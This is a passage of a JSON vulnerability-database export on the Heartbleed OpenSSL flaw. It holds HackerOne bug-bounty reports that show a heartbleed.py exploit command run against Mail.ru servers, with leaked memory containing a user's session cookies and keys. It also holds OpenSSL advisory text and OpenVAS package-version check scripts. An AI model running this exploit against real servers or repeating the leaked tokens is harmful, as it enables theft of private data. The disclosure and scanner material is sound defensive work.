(CVE-2014-0160)\r\n\r\n##################################################################\r\nConnecting to: 185.30.178.33:1443, 1 times\r\nSending Client Hello for TLSv1.0\r\nReceived Server Hello for TLSv1.0\r\n\r\nWARNING: 185.30.178.33:1443 returned more data than it should - server is vulnerable!\r\nPlease wait... connection attempt 1 of 1\r\n##################################################################\r\n\r\n.@....SC[...r....+..H...9...\r\n....w.3....f...\r\n...!.9.8.........5...............\r\n.........3.2.....E.D...../...A.................................I.........\r\n...........\r\n...................................#.......X-Requested-With: XMLHttpRequest\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36\r\nReferer: https://adm.riotzone.net:1443/webadm/\r\nAccept-Encoding: gzip, deflate, sdch\r\nAccept-Language: en-US,en;q=0.8,ru;q=0.6\r\nCookie: fbm_335418533141749=base_domain=.riotzone.net; weblang=de; auser=1177778; atype=my; asess=2d53c33bbbb985848534e390323c0630; ashow=100007781204577@facebook; nofoo=1; anick=LaVerdad; aserv=1; level=50; sess_uid=1177778; sess_key=2d53c33bbbb985848534e390323c0630; __utma=72033936.1263205956.1413451723.1421595142.1421602346.373; __utmc=72033936; __utmz=72033936.1421073483.352.29.utmcsr=riotzone.net|utmccn=(referral)|utmcmd=referral|utmcct=/riot/RiotLoaderRelease.swf\r\n\r\n.....\r\nSM....)..Z..............b....o...~..^..DF..4......g..%.E.EaVHhJUTZhak8xNWdJYTRIZExkVXpuSVUxVmIwZHVrSV9ZTWw0bkpEQktHVkQyQ3Fpb190MGZFclhMYVg2bjVBMTZnVkZpMWlHMzJ3VFVPNTlvZFR2VU5QWnBjZXBRaVh5OTNHdVR5cEJlR2NCUzhENWR5WXJTcU1CNHRteTl2Q01YTUhjQ212STFkRzZid0poaCIsImlzc3VlZF9hdCI6MTQyMTYwMjM1NCwidXNlcl9pZCI6IjEwMDAwNzc4MTIwNDU3NyJ9; sess_uid=1177778; sess_key=2d53c33bbbb985848534e390323c0630; __utma=72033936.1263205956.1413451723.1421595142.1421602346.373; __utmb=72033936.2.10.1421602346; __utmc=72033936; __utmz=72033936.1421073483.352.29.utmcsr=riotzone.net|utmccn=(referral)|utmcmd=referral|utmcct=/riot/RiotLoaderRelease.swf\r\n", "edition": 7, "reporter": "isox", "published": "2015-01-19T13:54:12", "title": "Mail.ru: Heartbleed: my.com (185.30.178.33) port 1433", "type": "hackerone", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "h1reporter": {"profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/006/507/3ed45c1ec7705aa8498e3bba6d5f8b845fe8b993_small.png?1400926274"}, "hacker_mediation": false, "disabled": false, "is_me?": false, "hackerone_triager": false, "url": "/isox", "username": "isox"}, "bulletinFamily": "bugbounty", "cvelist": ["CVE-2014-0160"], "modified": "2015-09-13T12:13:15", "id": "H1:44294", "href": "https://hackerone.com/reports/44294", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T00:39:12", "references": [], "bounty": 0.0, "h1team": {"profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/000/024/75262df009f3ef03cea184defe7c7b10a728f58a_small.png?1384251609", "medium": "https://profile-photos.hackerone-user-content.com/000/000/024/e7fbd40dac4117a139413866b5ecda76d66c8346_medium.png?1384251609"}, "handle": "ibb-openssl", "url": "https://hackerone.com/ibb-openssl"}, "bountyState": "resolved", "description": "A missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64k of memory to a connected client or server.\n\nOnly 1.0.1 and 1.0.2-beta releases of OpenSSL are affected including 1.0.1f and 1.0.2-beta1.\n\nThanks for Neel Mehta of Google Security for discovering this bug and to Adam Langley <agl@chromium.org> and Bodo Moeller <bmoeller@acm.org> for preparing the fix.\n\nAffected users should upgrade to OpenSSL 1.0.1g. Users unable to immediately upgrade can alternatively recompile OpenSSL with -DOPENSSL_NO_HEARTBEATS.\n\n1.0.2 will be fixed in 1.0.2-beta2.\n\nhttp://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=96db9023b881d7cd9f379b0c154650d6c108e9a3\n", "edition": 5, "reporter": "Unknown", "published": "2014-04-05T23:51:06", "title": "OpenSSL (IBB): TLS heartbeat read overrun", "type": "hackerone", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "h1reporter": {}, "bulletinFamily": "bugbounty", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-07T16:53:31", "id": "H1:6626", "href": "https://hackerone.com/reports/6626", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-11-23T12:55:41", "references": [], "bounty": 150.0, "h1team": {"profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/000/065/b5353ff7c53e16da116c7f4e73cc5687ec7d8809_small.png?1542897520", "medium": "https://profile-photos.hackerone-user-content.com/000/000/065/07da688e1d8801d35fdb85376bd9d64e424e6dab_medium.png?1542897520"}, "handle": "mailru", "url": "https://hackerone.com/mailru"}, "bountyState": "resolved", "description": "MacBook-Pro-Kirill:Pentest isox$ python heartbleed.py scfbp.tng.mail.ru\r\n\r\ndefribulator v1.16\r\nA tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)\r\n\r\n##################################################################\r\nConnecting to: scfbp.tng.mail.ru:443, 1 times\r\nSending Client Hello for TLSv1.0\r\nReceived Server Hello for TLSv1.0\r\n\r\nWARNING: scfbp.tng.mail.ru:443 returned more data than it should - server is vulnerable!\r\nPlease wait... connection attempt 1 of 1\r\n##################################################################\r\n\r\n.@....SC[...r....+..H...9...\r\n....w.3....f...\r\n...!.9.8.........5...............\r\n.........3.2.....E.D...../...A.................................I.........\r\n...........\r\n...................................#.........Y.[.uu.n.~J....4.F.P.<.5}b.n\r\n.................................3t.............http/1.1.spdy/3.1.h2-14uP.........\r\n.............WXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1\r\nHost: 195.211.20.229\r\nAccept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1\r\n", "edition": 7, "reporter": "isox", "published": "2015-02-25T07:49:11", "title": "Mail.ru: scfbp.tng.mail.ru: Heartbleed", "type": "hackerone", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "h1reporter": {"profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/006/507/3ed45c1ec7705aa8498e3bba6d5f8b845fe8b993_small.png?1400926274"}, "hacker_mediation": false, "disabled": false, "is_me?": false, "hackerone_triager": false, "url": "/isox", "username": "isox"}, "bulletinFamily": "bugbounty", "cvelist": ["CVE-2014-0160"], "modified": "2015-09-13T12:16:27", "id": "H1:49139", "href": "https://hackerone.com/reports/49139", "cvss": {"score": 0.0, "vector": "NONE"}}], "openvas": [{"lastseen": "2018-03-20T16:44:18", "references": ["http://www.debian.org/security/2014/dsa-2896.html"], "pluginID": "702896", "description": "A vulnerability has been discovered\nin OpenSSL", "edition": 3, "reporter": "Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net", "published": "2014-04-07T00:00:00", "title": "Debian Security Advisory DSA 2896-1 (openssl - security update)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2018-03-19T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=702896", "id": "OPENVAS:702896", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2896.nasl 9136 2018-03-19 13:08:02Z cfischer $\n# Auto-generated from advisory DSA 2896-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(702896);\n script_version(\"$Revision: 9136 $\");\n script_cve_id(\"CVE-2014-0160\");\n script_name(\"Debian Security Advisory DSA 2896-1 (openssl - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2018-03-19 14:08:02 +0100 (Mon, 19 Mar 2018) $\");\n script_tag(name: \"creation_date\", value: \"2014-04-07 00:00:00 +0200 (Mon, 07 Apr 2014)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-2896.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"openssl on Debian Linux\");\n script_tag(name: \"insight\", value: \"This package contains the openssl binary and related tools.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy),\nthis problem has been fixed in version 1.0.1e-2+deb7u5.\n\nFor the testing distribution (jessie), this problem has been fixed in\nversion 1.0.1g-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.0.1g-1.\n\nWe recommend that you upgrade your openssl packages.\");\n script_tag(name: \"summary\", value: \"A vulnerability has been discovered\nin OpenSSL's support for the TLS/DTLS Heartbeat extension. Up to 64KB of memory\nfrom either client or server can be recovered by an attacker. This vulnerability\nmight allow an attacker to compromise the private key and other sensitive data in\nmemory.\n\nAll users are urged to upgrade their openssl packages (especially\nlibssl1.0.0) and restart applications as soon as possible.\n\nAccording to the currently available information, private keys should be\nconsidered as compromised and regenerated as soon as possible. More\ndetails will be communicated at a later time.\n\nThe oldstable distribution (squeeze) is not affected by this\nvulnerability.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libssl-dev\", ver:\"1.0.1e-2+deb7u5\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl-doc\", ver:\"1.0.1e-2+deb7u5\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl1.0.0\", ver:\"1.0.1e-2+deb7u5\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libssl1.0.0-dbg\", ver:\"1.0.1e-2+deb7u5\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openssl\", ver:\"1.0.1e-2+deb7u5\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-12-12T11:10:34", "references": ["2014:0492_1"], "pluginID": "850582", "description": "Check for the Version of update", "edition": 3, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-04-10T00:00:00", "title": "SuSE Update for update openSUSE-SU-2014:0492-1 (update)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2017-12-08T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=850582", "id": "OPENVAS:850582", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2014_0492_1.nasl 8044 2017-12-08 08:32:49Z santu $\n#\n# SuSE Update for update openSUSE-SU-2014:0492-1 (update)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(850582);\n script_version(\"$Revision: 8044 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-08 09:32:49 +0100 (Fri, 08 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-10 13:36:01 +0530 (Thu, 10 Apr 2014)\");\n script_cve_id(\"CVE-2014-0160\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"SuSE Update for update openSUSE-SU-2014:0492-1 (update)\");\n\n tag_insight = \"\n This openssl update fixes one security issue:\n\n - bnc#872299: Fixed missing bounds checks for heartbeat\n messages (CVE-2014-0160).\";\n\n tag_affected = \"update on openSUSE 13.1, openSUSE 12.3\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"openSUSE-SU\", value: \"2014:0492_1\");\n script_summary(\"Check for the Version of update\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE12.3\")\n{\n\n if ((res = isrpmvuln(pkg:\"libopenssl-devel\", rpm:\"libopenssl-devel~1.0.1e~1.44.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1_0_0\", rpm:\"libopenssl1_0_0~1.0.1e~1.44.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1_0_0-debuginfo\", rpm:\"libopenssl1_0_0-debuginfo~1.0.1e~1.44.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.1e~1.44.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-debuginfo\", rpm:\"openssl-debuginfo~1.0.1e~1.44.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-debugsource\", rpm:\"openssl-debugsource~1.0.1e~1.44.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl-devel-32bit\", rpm:\"libopenssl-devel-32bit~1.0.1e~1.44.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1_0_0-32bit\", rpm:\"libopenssl1_0_0-32bit~1.0.1e~1.44.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1_0_0-debuginfo-32bit\", rpm:\"libopenssl1_0_0-debuginfo-32bit~1.0.1e~1.44.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~1.0.1e~1.44.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE13.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libopenssl-devel\", rpm:\"libopenssl-devel~1.0.1e~11.32.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1_0_0\", rpm:\"libopenssl1_0_0~1.0.1e~11.32.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1_0_0-debuginfo\", rpm:\"libopenssl1_0_0-debuginfo~1.0.1e~11.32.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.1e~11.32.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-debuginfo\", rpm:\"openssl-debuginfo~1.0.1e~11.32.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-debugsource\", rpm:\"openssl-debugsource~1.0.1e~11.32.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl-devel-32bit\", rpm:\"libopenssl-devel-32bit~1.0.1e~11.32.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1_0_0-32bit\", rpm:\"libopenssl1_0_0-32bit~1.0.1e~11.32.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1_0_0-debuginfo-32bit\", rpm:\"libopenssl1_0_0-debuginfo-32bit~1.0.1e~11.32.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~1.0.1e~11.32.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-11-23T15:14:21", "references": ["2014:0376-01", "https://www.redhat.com/archives/rhsa-announce/2014-April/msg00017.html"], "pluginID": "1361412562310871154", "description": "The remote host is missing an update for the ", "edition": 7, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-04-08T00:00:00", "title": "RedHat Update for openssl RHSA-2014:0376-01", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310871154", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871154", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for openssl RHSA-2014:0376-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871154\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-08 12:13:57 +0530 (Tue, 08 Apr 2014)\");\n script_cve_id(\"CVE-2014-0160\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"RedHat Update for openssl RHSA-2014:0376-01\");\n\n\n script_tag(name:\"affected\", value:\"openssl on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"insight\", value:\"OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. (CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"RHSA\", value:\"2014:0376-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2014-April/msg00017.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssl'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.1e~16.el6_5.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-debuginfo\", rpm:\"openssl-debuginfo~1.0.1e~16.el6_5.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~1.0.1e~16.el6_5.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-25T10:48:18", "references": ["2014:0376", "http://lists.centos.org/pipermail/centos-announce/2014-April/020249.html"], "pluginID": "881918", "description": "Check for the Version of openssl", "edition": 2, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-04-08T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "CentOS Update for openssl CESA-2014:0376 centos6 ", "type": "openvas", "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0160"], "modified": "2017-07-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=881918", "id": "OPENVAS:881918", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for openssl CESA-2014:0376 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(881918);\n script_version(\"$Revision: 6656 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:49:38 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-08 11:30:13 +0530 (Tue, 08 Apr 2014)\");\n script_cve_id(\"CVE-2014-0160\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"CentOS Update for openssl CESA-2014:0376 centos6 \");\n\n tag_insight = \"OpenSSL is a toolkit that implements the Secure Sockets Layer\n(SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. (CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\n\";\n\n tag_affected = \"openssl on CentOS 6\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"CESA\", value: \"2014:0376\");\n script_xref(name: \"URL\" , value: \"http://lists.centos.org/pipermail/centos-announce/2014-April/020249.html\");\n script_summary(\"Check for the Version of openssl\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", 